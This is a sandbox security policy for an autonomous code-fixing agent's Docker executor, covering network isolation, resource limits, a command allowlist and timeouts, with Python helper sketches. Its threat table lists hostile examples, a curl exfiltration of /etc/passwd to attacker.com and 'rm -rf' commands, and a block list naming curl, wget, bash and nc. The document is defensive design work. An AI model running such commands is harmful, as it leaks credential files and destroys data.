	# Sandbox Security Policy

	## Purpose
	This document describes the security controls applied to the Docker-based code execution
	sandbox used by the Autonomous Code Review & Bug-Fix Agent.

	## Threat Model
	The sandbox runs untrusted LLM-generated code and arbitrary pytest test suites
	from public GitHub repositories. The risk categories are:

| Threat | Example | Control |
|--------|---------|---------|
| Data exfiltration | `curl https://attacker.com/$(cat /etc/passwd)` | `--network=none` |
| Resource exhaustion | Infinite loop / fork bomb | `--memory=2g`, `--cpus=2.0`, 60 s timeout |
| Host filesystem access | `open('/etc/passwd')` | `--read-only`; only `/workspace` is bind-mounted |
| Privilege escalation | `sudo rm -rf /` | Non-root user (uid=1000) |
| Malicious commands | `rm -rf /workspace` | Command whitelist |
| Persistent state | Writing outside `/workspace` | `--read-only` + size-limited tmpfs |

	## Security Controls (7 Layers)

	### 1. Network Isolation — `--network=none`
The container has no network interfaces apart from loopback: no DNS, no HTTP, and no outbound TCP or UDP connections.
This is the most important control, because it prevents data exfiltration and blocks
supply-chain attacks by untrusted test dependencies that need network access.
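A quick way to confirm that this layer is active is to attempt an outbound connection from inside the container. The sketch below is a hypothetical self-check, not part of the described executor; the function name and the default target (a public DNS resolver at `1.1.1.1:53`) are arbitrary assumptions. Because `--network=none` still leaves a loopback interface, probing `127.0.0.1` says nothing about external reachability.

```python
import socket


def has_outbound_network(host: str = "1.1.1.1", port: int = 53, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port can be opened.

    Hypothetical self-check meant to run inside the sandbox. Under
    --network=none it should return False, because the only interface
    is loopback and external addresses are unreachable.
    """
    try:
        # create_connection raises OSError (timeouts included) on failure.
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

Run as the first step of a sandboxed job, a `True` result would indicate that the container was started without the network flag.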

	### 2. Memory cgroup — `--memory=2g`
Processes in the container are killed by the kernel OOM killer if the container's memory usage exceeds 2 GB.
This stops runaway allocations, and the memory consumed by a fork bomb's processes, from exhausting host memory.
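Docker reads the `k`, `m`, and `g` suffixes in `--memory` as binary multiples, so `2g` means 2 GiB (2,147,483,648 bytes). The hypothetical helper below, a simplified parser that only handles the `b`/`k`/`m`/`g` suffixes, makes that arithmetic explicit. On a cgroup v2 host, the same number should appear in `/sys/fs/cgroup/memory.max` inside the container.

```python
# Binary multipliers, matching how Docker reads the b/k/m/g suffixes.
_MEMORY_UNITS = {"b": 1, "k": 1024, "m": 1024**2, "g": 1024**3}


def memory_limit_bytes(spec: str) -> int:
    """Convert a --memory style value such as "2g" into bytes (simplified)."""
    spec = spec.strip().lower()
    if not spec:
        raise ValueError("empty memory spec")
    if spec[-1] in _MEMORY_UNITS:
        number, multiplier = spec[:-1], _MEMORY_UNITS[spec[-1]]
    else:
        # A bare number is interpreted as bytes.
        number, multiplier = spec, 1
    return int(float(number) * multiplier)
```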

	### 3. CPU cgroup — `--cpus=2.0`
Caps the container at 2 CPUs' worth of CPU time per scheduling period; this is a quota, not pinning to 2 specific cores.
It prevents CPU saturation that would degrade other running containers or the host system.
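According to the Docker documentation, `--cpus` is shorthand for a CFS quota: `--cpus=1.5` is equivalent to `--cpu-period=100000 --cpu-quota=150000`. The small hypothetical helper below performs that conversion, so `--cpus=2.0` corresponds to 200,000 µs of CPU time per 100,000 µs period. On a cgroup v2 host, the container's `/sys/fs/cgroup/cpu.max` should read `200000 100000`.

```python
DEFAULT_CFS_PERIOD_US = 100_000  # Docker's default scheduling period (100 ms)


def cpus_to_cfs_quota(cpus: float, period_us: int = DEFAULT_CFS_PERIOD_US) -> int:
    """Return the CFS quota (microseconds of CPU time per period) for a --cpus value."""
    if cpus <= 0:
        raise ValueError("cpus must be positive")
    # round() with no ndigits returns an int.
    return round(cpus * period_us)
```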

	### 4. Read-Only Filesystem — `--read-only --tmpfs=/tmp:size=256m`
The container's root filesystem is mounted read-only. Only two locations are writable:
	- `/workspace` — the cloned repo (bind-mounted, scoped to this run)
	- `/tmp` — tmpfs, 256 MB, wiped at container exit
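Taken together, layers 1 to 4 map onto a single `docker run` invocation. The sketch below assembles that argument list in Python as an illustration under assumptions, not as the project's executor. The image name `sandbox-image:latest` is a placeholder, `--user=1000:1000` is one assumed way of enforcing the non-root user from layer 6 (the image could equally set it), `--workdir` is an assumption, and `--rm` comes from the "Isolation Per Run" section.

```python
from __future__ import annotations

from pathlib import Path

# Placeholder image name; the policy does not name the sandbox image.
SANDBOX_IMAGE = "sandbox-image:latest"


def build_docker_run_argv(
    workspace: Path,
    command: list[str],
    image: str = SANDBOX_IMAGE,
    container_name: str | None = None,
) -> list[str]:
    """Assemble a `docker run` argv applying the sandbox's resource and FS limits."""
    argv = [
        "docker", "run",
        "--rm",                    # container is deleted when it exits
        "--network=none",          # layer 1: loopback only, no external network
        "--memory=2g",             # layer 2: memory cgroup limit
        "--cpus=2.0",              # layer 3: CPU quota equivalent to 2 CPUs
        "--read-only",             # layer 4: read-only root filesystem
        "--tmpfs=/tmp:size=256m",  # layer 4: writable, size-capped /tmp
        "--user=1000:1000",        # assumption: one way to enforce layer 6
        f"--volume={workspace.resolve()}:/workspace",  # per-run writable workspace
        "--workdir=/workspace",    # assumption: run commands from the repo root
    ]
    if container_name is not None:
        # A known name lets a timeout handler stop this exact container.
        argv.append(f"--name={container_name}")
    argv.append(image)
    argv.extend(command)  # kept as separate tokens, never joined into a shell string
    return argv
```

Passing the resulting list straight to `subprocess.run` (without `shell=True`) keeps shell metacharacters in `command` from being interpreted on the host.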

	### 5. Command Whitelist — `ALLOWED_COMMANDS`
	Before any command reaches Docker, the executor checks the base command name
	against an allowlist: `{git, pytest, python, python3, pip, pip3, cat, ls, echo,
	find, grep, head, tail, mkdir, cp, mv, touch, chmod}`.

	Commands like `rm`, `curl`, `wget`, `bash`, `sh`, `nc` are blocked at this layer.
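A minimal sketch of the base-command check follows. Two details are assumptions: that the "base command name" is the first shell-style token with any directory prefix stripped, and that malformed input is rejected. The check is only meaningful if the tokens are then executed as an argument list; if they were handed to `sh -c`, a string such as `echo hi; rm -rf /` would pass because its first token is `echo`.

```python
import os
import shlex

# Allowlist copied from the policy above.
ALLOWED_COMMANDS = frozenset({
    "git", "pytest", "python", "python3", "pip", "pip3", "cat", "ls", "echo",
    "find", "grep", "head", "tail", "mkdir", "cp", "mv", "touch", "chmod",
})


def is_command_allowed(command: str) -> bool:
    """Return True if the command's base name is on the allowlist."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # e.g. unbalanced quotes: reject rather than guess
        return False
    if not tokens:
        return False
    # "/usr/bin/python3" and "python3" both reduce to "python3".
    return os.path.basename(tokens[0]) in ALLOWED_COMMANDS
```

Because `python`, `pip`, `mv`, and `chmod` are on the list, this layer alone cannot stop destructive actions such as `python -c "import shutil; shutil.rmtree('/workspace')"`; the read-only filesystem and non-root user layers are what bound the damage in that case.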

	### 6. Non-Root User — `uid=1000`
All processes run as `agent:agent` (uid:gid `1000:1000`). If an exploit gets past the
command whitelist, it still lacks root privileges, so it cannot modify root-owned system files and has no elevated rights to abuse.
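The executor could also refuse to start when the uid is wrong, so that a misconfigured image fails loudly instead of silently running as root. The guard below is a hypothetical sketch (the function name and the choice to raise `PermissionError` are assumptions); it would run as the first step inside the container and is POSIX-only, since `os.geteuid` does not exist on Windows.

```python
import os


def assert_unprivileged(expected_uid: int = 1000, expected_gid: int = 1000) -> None:
    """Raise PermissionError unless running as the expected non-root uid:gid."""
    uid, gid = os.geteuid(), os.getegid()
    if uid == 0:
        raise PermissionError("refusing to run sandboxed code as root")
    if (uid, gid) != (expected_uid, expected_gid):
        raise PermissionError(
            f"expected uid:gid {expected_uid}:{expected_gid}, got {uid}:{gid}"
        )
```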

	### 7. Timeout — 60 seconds SIGKILL
The executor enforces a 60-second hard timeout. When it expires, the container is stopped with
`docker stop --time=0`, which skips the grace period so its processes are SIGKILLed at once.
This keeps hung processes from consuming resources indefinitely.
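One way to implement this is sketched below, assuming the executor drives the Docker CLI through `subprocess` and names each container so it can be stopped later. On expiry, `subprocess.run(..., timeout=...)` kills only the local `docker run` client process, not necessarily the container itself, so the sketch stops the container explicitly. The `on_timeout` hook and the `ExecResult` type are hypothetical; the result fields mirror the audit log fields listed in the next section.

```python
from __future__ import annotations

import subprocess
import time
from dataclasses import dataclass
from typing import Callable

TIMEOUT_SECONDS = 60.0


@dataclass
class ExecResult:
    returncode: int | None  # None when the run was cut off by the timeout
    elapsed_seconds: float
    timed_out: bool


def docker_stop_now(container_name: str) -> None:
    # --time=0 skips the grace period, so Docker SIGKILLs the container at once.
    subprocess.run(
        ["docker", "stop", "--time=0", container_name],
        capture_output=True,
        check=False,
    )


def run_with_timeout(
    argv: list[str],
    container_name: str,
    timeout: float = TIMEOUT_SECONDS,
    on_timeout: Callable[[str], None] = docker_stop_now,
) -> ExecResult:
    start = time.monotonic()
    try:
        proc = subprocess.run(argv, capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        # run() has already killed the local client process; the container
        # may still be running, so stop it explicitly.
        on_timeout(container_name)
        return ExecResult(None, time.monotonic() - start, True)
    return ExecResult(proc.returncode, time.monotonic() - start, False)
```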

	## Isolation Per Run
	Each SWE-bench instance gets a fresh temporary directory as its workspace.
	The container is created with `--rm` so it is automatically deleted after each run.
	No state persists between runs.
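Per-run isolation amounts to a new directory for every instance plus a container that deletes itself. A minimal sketch of the directory half is shown below; the helper name, the `sandbox-` prefix, and the cleanup-on-exit behavior are assumptions rather than details from the policy. The path it yields is what would be bind-mounted at `/workspace`.

```python
import re
import shutil
import tempfile
from contextlib import contextmanager
from pathlib import Path
from typing import Iterator


@contextmanager
def fresh_workspace(instance_id: str) -> Iterator[Path]:
    """Yield a new empty directory for one instance and delete it afterwards."""
    # Keep the prefix filesystem-safe regardless of what the instance id contains.
    safe_id = re.sub(r"[^A-Za-z0-9._-]", "_", instance_id)
    path = Path(tempfile.mkdtemp(prefix=f"sandbox-{safe_id}-"))
    try:
        yield path
    finally:
        # ignore_errors: files written by the container's uid may resist cleanup.
        shutil.rmtree(path, ignore_errors=True)
```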

	## Audit Log
	Every command executed in the sandbox is logged with:
	- instance_id
- command (truncated to the first 3 tokens for brevity)
	- returncode
	- elapsed_seconds
	- timed_out flag

Logs are emitted through `structlog` (JSON-formatted in production) and ingested by
the Prometheus/Grafana observability stack in Phase 8.
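Each entry is a flat set of key-value pairs. The hypothetical helper below builds one, keeping only the first three tokens of the command as the policy describes. With structlog, the dict could then be emitted as keyword arguments, e.g. `structlog.get_logger().info("sandbox_exec", **record)`, and rendered as JSON by `structlog.processors.JSONRenderer`; the event name `sandbox_exec` is an assumption.

```python
import shlex
from typing import Optional


def audit_record(
    instance_id: str,
    command: str,
    returncode: Optional[int],
    elapsed_seconds: float,
    timed_out: bool,
) -> dict:
    """Build one audit-log entry with the fields listed in the policy."""
    return {
        "instance_id": instance_id,
        # Truncate to the first 3 tokens, as the policy specifies.
        "command": " ".join(shlex.split(command)[:3]),
        "returncode": returncode,
        "elapsed_seconds": elapsed_seconds,
        "timed_out": timed_out,
    }
```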

	## Known Limitations
- Conda environments: Some SWE-bench repos require specific conda environments
with C extensions. The current sandbox installs dependencies with pip only, which may cause
test failures for repos with complex native dependencies.
- Docker-in-Docker: The sandbox does not support running Docker inside Docker.
Repos whose tests spawn subprocesses that call Docker will fail, because no Docker daemon is reachable from the network-isolated container.
- Flaky tests: ~8% of SWE-bench issues have non-deterministic tests. These can
consume retries even when the patch is correct; such issues are flagged with the `flaky_test` category.
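The policy does not say how `flaky_test` cases are detected. One common heuristic, sketched below purely as an illustration, is to rerun the same test command a few times against an unchanged patch and flag the result as flaky when the outcomes disagree. The `run_tests` callable, the function name, and the default of three reruns are assumptions.

```python
from typing import Callable


def classify_test_outcome(run_tests: Callable[[], bool], reruns: int = 3) -> str:
    """Return "pass", "fail", or "flaky_test" based on repeated runs.

    run_tests() should execute the suite against an unchanged patch and
    return True when it passes.
    """
    if reruns < 1:
        raise ValueError("reruns must be at least 1")
    outcomes = {run_tests() for _ in range(reruns)}
    if len(outcomes) > 1:
        # The same code both passed and failed: the tests are non-deterministic.
        return "flaky_test"
    return "pass" if outcomes.pop() else "fail"
```

This only detects non-determinism that shows up within the observed reruns; a flaky test that happens to fail every time is still reported as `fail`.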